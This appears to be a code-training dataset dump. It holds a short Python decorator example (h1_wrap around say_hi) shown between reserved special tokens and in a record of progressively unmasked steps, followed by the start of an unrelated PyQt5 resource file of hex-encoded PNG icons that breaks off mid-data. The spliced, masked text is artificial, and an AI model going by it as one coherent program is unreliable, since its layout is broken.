return 'Hello, ' + name.capitalize()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def h1_wrap(func):
def func_wrapper(param):
return '<h1>' + func(param) + '</h1>'
return func_wrapper
@h1_wrap
def say_hi(name):
return 'Hello, ' + name.capitalize()
print(say_hi('Stephan'))
<|reserved_special_token_1|>
def h1_wrap(func):
def func_wrapper(param):
return "<h1>"+func(param) + "</h1>"
return func_wrapper
@h1_wrap
def say_hi(name):
return "Hello, " + name.capitalize()
print(say_hi("Stephan"))
|
flexible
|
{
"blob_id": "9c9005acb40e4b89ca215345361e21f08f984847",
"index": 5735,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@h1_wrap\ndef say_hi(name):\n return 'Hello, ' + name.capitalize()\n\n\n<mask token>\n",
"step-3": "def h1_wrap(func):\n\n def func_wrapper(param):\n return '<h1>' + func(param) + '</h1>'\n return func_wrapper\n\n\n@h1_wrap\ndef say_hi(name):\n return 'Hello, ' + name.capitalize()\n\n\n<mask token>\n",
"step-4": "def h1_wrap(func):\n\n def func_wrapper(param):\n return '<h1>' + func(param) + '</h1>'\n return func_wrapper\n\n\n@h1_wrap\ndef say_hi(name):\n return 'Hello, ' + name.capitalize()\n\n\nprint(say_hi('Stephan'))\n",
"step-5": "def h1_wrap(func):\n def func_wrapper(param):\n return \"<h1>\"+func(param) + \"</h1>\"\n return func_wrapper\n\n\n@h1_wrap\ndef say_hi(name):\n return \"Hello, \" + name.capitalize()\n\n\nprint(say_hi(\"Stephan\"))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x01\xde\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x28\x00\x00\x00\x28\x08\x06\x00\x00\x00\x8c\xfe\xb8\x6d\
\x00\x00\x01\xa5\x49\x44\x41\x54\x78\x9c\xed\xd8\x3f\x6b\x14\x41\
\x1c\x87\xf1\x4f\x42\x2c\x8d\x45\x88\x58\x0b\x22\x24\x20\xa4\xb0\
\x49\xa3\x28\x8a\x08\xfe\x69\x24\x4d\xf0\xcc\xeb\x4a\x61\x52\xa8\
\x2f\xc1\xca\x22\x20\x36\x82\x58\x59\x58\x08\x2a\x68\xa2\x44\xc5\
\x34\x81\xa8\x9b\x62\x38\x18\xe6\x76\x6f\x2f\x97\x9d\x35\x1c\xfb\
\xc0\xc0\xdd\xcc\xee\xcd\xb3\xbf\xd9\xfd\xde\xdc\xd1\xd1\x71\x32\
\xb8\x8f\xef\x28\x8e\xd8\xbe\xe2\x56\x1b\x82\xdb\xb8\x3c\xc6\x79\
\x37\xf0\xbe\x61\x97\x52\x8a\x31\xcf\x3b\x83\x5f\x4d\x8a\xa4\x4c\
\xe7\xfc\xf0\x26\x98\x78\xc1\x7d\xfc\x73\xf4\x87\x2b\x6e\xdf\x70\
\xb7\x6e\xa2\x71\xef\xc1\x26\x58\xc6\xa7\xba\x83\xfe\xa7\xe0\xd0\
\xf9\x27\xfe\x1e\xcc\xce\x44\x08\xae\x0a\x61\x7c\x9c\x27\xb5\xae\
\x89\x5e\x1f\x60\x3d\x95\xa8\xba\x49\x67\xf1\x03\x0b\x23\x5c\x48\
\x53\x9c\xc3\xef\xfe\x9b\xba\x0a\xae\xe0\x05\xde\xe5\x34\x4a\xb8\
\x87\xe7\x69\x67\x55\x05\x5f\xe2\x4e\x56\x9d\x41\x5e\xe1\x76\xda\
\x59\x26\x78\x41\xd8\x4e\xcd\xe4\x36\x8a\xb8\x88\x2f\xf1\x9c\xc3\
\x96\xf8\x21\x9e\xe2\x4f\x66\xa9\x98\x1e\x9e\x94\xcd\x99\x56\x70\
\x1a\x1f\x71\xa9\x05\xa9\x78\xce\xcf\x58\x2c\x1b\x4c\x05\xaf\xe1\
\x4d\x6e\xa3\x84\x9b\x78\x9d\x76\x56\x2d\xf1\x1a\x1e\x67\xd5\x19\
\xa4\x87\x8d\xaa\xc1\xb8\x82\xa7\x85\xec\x9b\xcf\x2c\x14\x33\x8b\
\x9f\x98\x4b\x07\xca\x2a\xf8\x00\x5b\xc2\x8f\xa8\xb6\xe8\xe7\xed\
\x6e\xd5\x01\x71\x05\xb7\x84\xb0\x6c\x93\xda\xbc\xed\x0b\x9e\xc7\
\x0e\x4e\xe5\x36\x8a\x18\x9a\xb7\xe9\x12\xf7\xf0\x4c\xf8\xc2\x6e\
\x8b\x91\xf2\xb6\xc0\x14\x3e\x60\xa9\x05\xa9\x3e\x23\xe7\x6d\x81\
\xab\x78\x9b\x59\x28\xe5\xba\x9a\xbc\x8d\x97\xb8\x87\xcd\xac\x3a\
\x83\x3c\x32\x62\xde\x16\x42\xf6\x9d\xcd\x69\x13\x31\x25\xfc\xa7\
\xb3\xa3\x24\xfb\xca\xd8\x93\x77\xc7\x9c\xb6\xbf\xc2\x1e\xf3\xca\
\x31\x2f\xb4\xa3\xa3\xe3\xc4\x73\x08\x28\x98\x98\x24\xc8\xdd\xa5\
\x40\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x03\xab\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x03\x00\x00\x00\x28\x2d\x0f\x53\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x84\
\x50\x4c\x54\x45\x32\x37\x39\x00\x00\x00\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\xff\xff\xff\xeb\x7d\xd9\x30\x00\x00\x00\x2a\
\x74\x52\x4e\x53\x00\x00\x2c\xcf\xb7\x01\x18\x20\x1f\x1c\x15\xbd\
\x78\xc3\xc1\x77\x27\x31\x95\xbe\x2d\xdf\x50\x22\x1e\xca\xdc\x24\
\xc2\x28\x26\x32\x1d\x11\xb9\x4d\xf4\x12\xde\x4f\x88\xe0\xc4\x83\
\x03\xa2\x00\x00\x00\x01\x62\x4b\x47\x44\x2b\x24\xb9\xe4\x08\x00\
\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x04\x02\x0c\x2c\x5e\x9a\
\xf1\x93\x00\x00\x00\x89\x49\x44\x41\x54\x18\xd3\x55\xcf\xd9\x12\
\x82\x30\x10\x44\xd1\x8e\x18\x88\xc8\xb0\xb8\x05\x01\x41\x41\x41\
\xf3\xff\x1f\x68\x36\x04\xef\x5b\x9f\xaa\xa9\x4a\x80\x75\x9b\x60\
\x0b\x1e\x46\xc2\x16\xed\x78\xbc\x57\x01\x12\x4a\x5d\x94\xe5\xc5\
\xe1\x78\xc2\xf9\x22\xa4\xad\x2c\xe8\x5a\xc4\x40\x25\xfc\x7d\xdd\
\x28\xba\x71\x0d\x12\x8c\xe9\xdd\x36\xaa\xe9\xb2\xbb\x03\xb7\xa9\
\x2e\x29\x9a\xc1\xec\x16\x32\x9d\xe1\xd1\x9b\xbd\x82\xe1\xd9\xeb\
\xbd\x82\x7c\x78\xe1\x0f\x6c\x6c\x01\x9f\x07\xb1\xfc\x4d\x18\x18\
\x27\xff\x74\x29\xc5\x44\x21\xf0\x1e\xab\x5f\x9f\x84\xe3\x0b\x50\
\xe9\x0c\xb4\xd8\x75\xd4\x0e\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\
\x30\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x32\x30\x2b\x30\
\x30\x3a\x30\x30\x86\x67\x0e\x5c\x00\x00\x00\x25\x74\x45\x58\x74\
\x64\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x31\x39\
\x2d\x30\x31\x2d\x30\x38\x54\x31\x39\x3a\x34\x39\x3a\x34\x36\x2b\
\x30\x30\x3a\x30\x30\xb0\x72\x32\xb2\x00\x00\x00\x20\x74\x45\x58\
\x74\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\
\x2f\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\
\x67\xbc\xcf\x1d\x9d\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\
\x67\x65\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x19\x74\x45\x58\
\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\
\x65\x69\x67\x68\x74\x00\x31\x30\x36\x38\x8a\xfc\x51\x92\x00\x00\
\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\
\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\x00\x31\x30\x36\x38\x9f\xb5\
\x8d\x8b\x00\x00\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\
\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\
\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x34\x36\
\x39\x37\x36\x39\x38\x36\x42\x37\xbe\xd0\x00\x00\x00\x12\x74\x45\
\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x31\x38\
\x32\x33\x37\x42\x1b\x5d\x79\xed\x00\x00\x00\x5a\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\
\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\
\x77\x77\x77\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\
\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\
\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\x73\x2f\x31\x31\x39\x2f\x31\
\x31\x39\x30\x37\x31\x30\x2e\x70\x6e\x67\x5a\xd1\x76\x4b\x00\x00\
\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\x27\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x03\x00\x00\x00\xd7\xa9\xcd\xca\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x02\x01\
\x50\x4c\x54\x45\x00\x00\x00\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\
\x88\x84\x8f\x8d\x8a\x94\x85\x81\x8c\x85\x82\x8c\x8a\x87\x91\x8c\
\x89\x92\xab\xaa\xb0\x8f\x8c\x96\x8e\x8b\x95\x8e\x8b\x94\x90\x8e\
\x97\x8b\x87\x92\x9a\x98\xa1\x98\x96\x9e\x8e\x8c\x95\x86\x83\x8e\
\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x97\x8b\x88\x92\x8c\
\x89\x93\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\
\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\x8b\x88\x92\x8d\x8a\x93\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x93\x91\
\x9a\x8c\x89\x93\x8b\x88\x92\x8b\x89\x92\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8b\
\x88\x92\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\
\xb3\xae\xad\xb3\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xaa\xa9\xaf\
\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\xae\xad\xb3\xae\
\xad\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8b\x88\x92\x8f\x8c\
\x96\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\x8c\
\x89\x93\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\x8b\x88\x92\x8b\x88\
\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\
\x8b\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\x8c\
\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\
\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\x8b\
\x88\x92\x8b\x88\x92\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\
\xb3\xab\xaa\xb0\x8f\x8c\x96\x8b\x88\x92\x8e\x8c\x95\xae\xad\xb3\
\xaa\xa9\xaf\x8f\x8d\x96\x8b\x88\x92\x8c\x89\x93\xae\xad\xb3\x8b\
\x88\x92\x8c\x8a\x93\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\x88\x92\
\x8b\x88\x92\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\xae\xad\xb3\x8b\
\x88\x92\x8f\x8c\x95\x8c\x89\x93\x8b\x88\x92\x8b\x88\x92\xae\xad\
\xb3\xae\xad\xb3\x8b\x89\x92\x8c\x89\x93\x8c\x89\x93\xae\xad\xb3\
\x90\x8d\x96\x8b\x88\x92\xaa\xa9\xaf\x90\x8d\x96\x8b\x88\x92\xae\
\xad\xb3\x00\x00\x00\xb1\xc2\x75\x92\x00\x00\x00\xa6\x74\x52\x4e\
\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x03\x13\x15\x15\x14\x06\x2a\xc2\xcf\xcf\xce\
\x49\x18\x14\x45\xfb\x6f\x07\x14\x23\xbc\xb9\x2b\x6b\xfe\x91\x02\
\x12\xbf\x2a\xbe\xd5\xa9\xe8\xee\xa7\xb8\xc7\x11\xb8\xc6\x1e\x08\
\x94\xc0\x19\xba\xf4\xf4\xdb\x31\xa1\xdf\x79\x3d\x3c\x75\xb5\x03\
\x05\x41\x65\x86\xeb\x3d\x36\xd9\xed\x71\x47\x2b\x04\xca\x6e\xfb\
\xc3\x13\xce\xf4\x34\xf0\xd0\x15\xcf\x3b\x33\xef\xcf\xc5\xfd\x74\
\x69\xfe\x04\x30\x4e\xea\xdb\x35\x2f\xd5\xf2\x96\x4b\xab\xd9\x6d\
\x33\x33\xb1\x05\x25\xf0\xef\xc1\x17\xb1\x9a\x0a\x1a\xc3\xc8\x29\
\xc6\xc4\xad\xef\xb7\xd7\xc1\x9f\x02\x8a\x7c\x04\x2c\xba\xcc\x17\
\x0b\x51\x16\x21\xcc\x15\x04\x0d\xb7\x9c\xe1\x00\x00\x00\x01\x62\
\x4b\x47\x44\x00\x88\x05\x1d\x48\x00\x00\x00\x09\x70\x48\x59\x73\
\x00\x00\x00\x64\x00\x00\x00\x64\x00\x0f\x96\xc5\xdd\x00\x00\x00\
\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\x30\x1e\x4a\x5a\xd3\x78\
\x00\x00\x01\x8a\x49\x44\x41\x54\x28\xcf\x63\x60\x80\x02\x46\x11\
\x51\x31\x71\x09\x49\x26\x06\x24\xc0\x08\x06\x52\xd2\x32\xb2\x72\
\xf2\xcc\x4c\x4c\x4c\x2c\xac\x70\x71\x05\x45\x46\x46\x25\xe5\x65\
\xcb\x57\xa8\x30\x33\xa9\xaa\x31\xb3\xb1\x42\xc5\xd5\x35\x34\xb5\
\x18\xb5\x75\x80\x12\xba\x7a\xfa\xba\x06\x86\xcc\xec\xac\x60\x09\
\x75\xa3\x95\x2b\x8d\x4d\x4c\x57\x02\x25\xcc\xcc\x2d\x56\xac\xb0\
\x34\x64\xe6\x00\x49\x58\x59\xaf\x84\x00\xa0\x04\x04\xd8\xd8\x72\
\x82\x24\xec\xec\xd1\x25\x1c\x1c\x99\xc0\x46\x29\x3a\x41\x24\x9c\
\x5d\x20\xe2\xae\x6e\xcc\xcc\x10\xb7\xba\x83\x84\x3d\x3c\xbd\xbc\
\x7d\x5c\x41\x12\xbe\x7e\xcc\x9c\x4c\x0c\xfe\x01\x81\x41\xc1\x20\
\xf1\x10\x46\x2e\x6e\x8e\xd0\x30\xa0\x44\x78\x44\x64\x54\x34\x83\
\x68\x0c\xc4\x1c\x4f\xa0\x4e\x56\x1e\x8e\x58\xb0\x61\x71\xf1\x09\
\x0c\x8a\x89\x60\xf1\xa4\x10\x46\x46\x06\x06\x56\xa6\xe4\x14\xb0\
\x4c\x6a\x1a\x83\x62\x3a\x44\x22\x03\x24\xc1\xcb\x94\x99\x05\x96\
\xc8\x4e\x63\x10\xcd\xc9\x05\xcb\xe4\x01\x8d\xe2\xe5\x63\xce\x2f\
\x00\x4b\xc8\x49\x30\x14\x16\x15\xe7\x95\x00\x25\x4a\xcb\x80\x96\
\xf3\x97\x57\x00\x45\x2b\xab\x22\xaa\x25\xc1\xce\xad\x01\x69\xa9\
\xad\xab\x6f\xc8\x07\x89\xaf\x68\x6c\x62\x86\x78\xa4\x19\x62\x8d\
\x4e\x4b\x2b\xc4\x9c\xb6\x76\x26\xb0\xcf\xad\x3a\xd0\x83\xa4\xb3\
\x0b\x2c\xd1\xdd\x83\x2e\xd1\x0b\x0d\xab\xbe\xfe\x95\x2b\x27\x4c\
\x9c\x04\x92\xc8\x9a\x3c\x05\xe8\x24\x37\x66\x01\x48\x44\x49\x4d\
\x9d\xd6\x3d\x7d\x06\x48\x62\xe6\xac\xd9\x73\xe6\xba\x31\x0b\x0a\
\x41\xa3\x70\xde\x7c\x46\xc6\x40\xa0\x44\xc1\x02\x66\xe6\x85\x8b\
\x98\x05\x79\x90\x13\x43\xc0\x62\x19\x59\xcb\x4c\x66\x60\x6a\x10\
\xe6\x41\x49\x2a\xfe\x8a\x62\x4b\x12\x96\x32\xc3\xf8\x00\x2f\x5c\
\xba\x88\xe8\x0b\x3a\x2c\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\
\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\x30\
\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x31\x38\x2b\x30\x30\
\x3a\x30\x30\x3b\x07\x47\xd8\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x32\x30\x2d\
\x30\x35\x2d\x30\x32\x54\x30\x31\x3a\x32\x38\x3a\x35\x35\x2b\x30\
\x30\x3a\x30\x30\x48\x1e\x77\xe4\x00\x00\x00\x20\x74\x45\x58\x74\
\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\
\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\
\xbc\xcf\x1d\x9d\x00\x00\x00\x63\x74\x45\x58\x74\x73\x76\x67\x3a\
\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x20\x47\x65\x6e\x65\x72\x61\x74\
\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\x6c\x75\x73\x74\
\x72\x61\x74\x6f\x72\x20\x31\x39\x2e\x30\x2e\x30\x2c\x20\x53\x56\
\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\x67\x2d\x49\x6e\
\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\x6f\x6e\x3a\x20\
\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\x29\x20\x20\xce\
\x48\x90\x0b\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\
\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\
\x67\x68\x74\x00\x35\x38\x37\x2e\x25\x1c\x47\x00\x00\x00\x17\x74\
\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\
\x3a\x57\x69\x64\x74\x68\x00\x35\x38\x37\xbd\xd4\x4c\x1a\x00\x00\
\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\
\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\
\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x38\x38\x33\x38\x32\x39\
\x33\x35\x93\xf3\x7b\x53\x00\x00\x00\x12\x74\x45\x58\x74\x54\x68\
\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x33\x32\x37\x36\x32\x42\
\x50\x47\x06\xdb\x00\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\
\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\
\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\
\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\
\x2f\x66\x69\x6c\x65\x73\x2f\x31\x32\x35\x2f\x31\x32\x35\x37\x33\
\x32\x38\x2e\x70\x6e\x67\xf9\x67\xb6\x19\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\xd2\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x06\x00\x00\x00\xe0\x77\x3d\xf8\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x06\
\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\xa7\x93\x00\x00\
\x00\x09\x70\x48\x59\x73\x00\x00\x0d\xd7\x00\x00\x0d\xd7\x01\x42\
\x28\x9b\x78\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\
\x30\x34\x91\xe1\x1a\xae\x00\x00\x05\x5d\x49\x44\x41\x54\x48\xc7\
\xdd\x95\x4d\x88\x9d\x57\x19\xc7\x7f\xef\xf7\x7d\xe7\xde\xb9\x33\
\x99\xef\xc9\x24\x4d\x1a\xd3\x4e\x1d\x9b\x59\x44\x0c\xba\xb0\x68\
\xa0\x76\x15\x37\x8a\xb8\x30\x45\x44\x10\xf1\x03\x5c\x99\x4d\x11\
\x04\x17\x82\x0b\x91\x5a\xe8\xca\x8d\x90\xd2\x9d\x8a\x22\xb8\xb2\
\xa2\x42\x5b\xd2\x26\xd1\x26\x69\x12\x93\x4c\xe6\xde\x99\xb9\x33\
\x73\xe7\x7e\xbf\xf7\x7d\xcf\x39\xcf\xe3\xe2\xde\x49\x8d\x58\x71\
\xed\x03\x7f\xce\xe1\x2c\xce\xef\xf9\x3f\xcf\x73\x38\x1e\x1f\x12\
\x2f\x7f\xeb\x02\xf1\xec\x71\x6c\xb7\x49\x69\x66\x99\x22\x9c\x60\
\xd0\xef\x91\xed\xd7\xf1\x87\x1d\xde\x7a\xd0\xe2\xfc\x33\x0b\x7c\
\xfb\x95\xdf\xf0\xdf\x22\xf8\x4f\x87\x3f\xff\xee\x17\x90\xce\x0e\
\xd3\xab\x9f\x64\x3e\x36\x95\x81\x84\x9f\xe8\x75\xbb\xe7\x8b\xac\
\x77\xd6\x13\x37\x9d\x52\xb4\xfb\x1a\x0f\xe7\x13\xcb\xf9\xb3\x4f\
\xf3\x87\x2b\x77\x3e\x14\xe0\xbd\x72\xf9\x75\xa6\xaa\x55\x96\x66\
\x67\xa9\xa4\x29\xbe\xef\xd3\xdb\xba\xcf\x9d\x95\x17\x28\xfd\xee\
\xa5\xcf\xde\xdf\x6e\x5e\xda\xdd\x6f\x7e\x5c\x55\x13\x0f\x3c\x67\
\x8d\xf1\xd5\xfd\x2d\x25\xff\xc9\x8f\xcf\xd5\x7f\xfd\xdb\x13\x3f\
\xd0\x78\xf6\x18\x59\x96\xd1\xed\x76\xd9\xdf\x6f\xb2\x59\xab\x71\
\xfb\xf6\x1d\xb6\xb7\xea\x84\x9e\xe7\x79\x61\x10\x44\x49\x14\xf9\
\xe5\x34\xf5\xe3\x28\xf2\x67\xd6\xce\xb2\xf9\xfa\x0f\x9f\xbf\x7e\
\xb7\xf6\xf2\x20\xcf\xcb\x9f\x3a\xff\xc2\x70\xe5\xe4\xe9\xe0\xc1\
\x83\x87\xfe\xb5\x2b\x6f\xe9\xee\x83\xdb\x67\x3b\xd6\xfd\xe2\x7b\
\x7f\x5d\xbe\xf4\x95\xf3\x6b\xbf\xea\x0d\x32\xf2\x3c\x17\x40\x44\
\x45\x44\x44\x55\xd5\x01\x7d\xef\xa7\xbf\x7c\xed\xa4\xc0\x8f\x82\
\x20\x58\x4c\xe3\x24\xf4\x7d\x2f\xf2\x86\xfd\x70\xf3\xca\x9f\x4f\
\x1d\x74\xbb\x73\x5f\xfc\xea\x37\xf3\xd5\xd5\xd5\xa4\xdd\xe9\xf2\
\xc6\x9f\xfe\xc2\xb5\xbf\xdf\xa0\xdb\x69\xd9\x41\xed\x56\xe8\x99\
\xac\x37\xf5\xc4\x47\xeb\x2d\xe3\xbb\x7c\x98\x4b\x5e\xe4\xae\xc8\
\x73\xc9\xf3\x42\xf2\x3c\xaf\x5b\x53\x7c\x27\x0c\xc3\x60\x32\x2b\
\xcc\xf3\x85\xb1\xf3\x59\x36\xc4\x39\xc1\x6f\x6f\x53\xaf\xd7\xf8\
\xf4\xe7\xbf\xc4\xfa\xb3\xcf\x26\x9e\x07\x6d\x55\xaa\xd5\x0a\x73\
\x33\x47\xf0\x83\x20\xcc\xba\x4b\xf4\x36\xde\xab\xec\xdf\xb8\xfe\
\x74\x93\x49\x54\x05\x54\x51\x55\x00\x54\x75\x09\x95\x52\x98\x26\
\x09\xb9\x71\xd6\x88\xc5\x59\x87\x88\x45\x5a\x7b\x04\x49\xca\xd2\
\xb1\x13\x74\x7a\x7d\xac\xb3\x38\x11\xd2\x52\x89\xea\x64\x85\xbc\
\x28\x28\x4d\x4e\xd3\xf1\x23\xc8\x33\x82\xb8\x8c\x11\x1d\x03\xe4\
\x10\xe0\x50\x25\x34\x85\x51\x15\xc1\x5a\x8b\x38\x41\xac\xc5\x64\
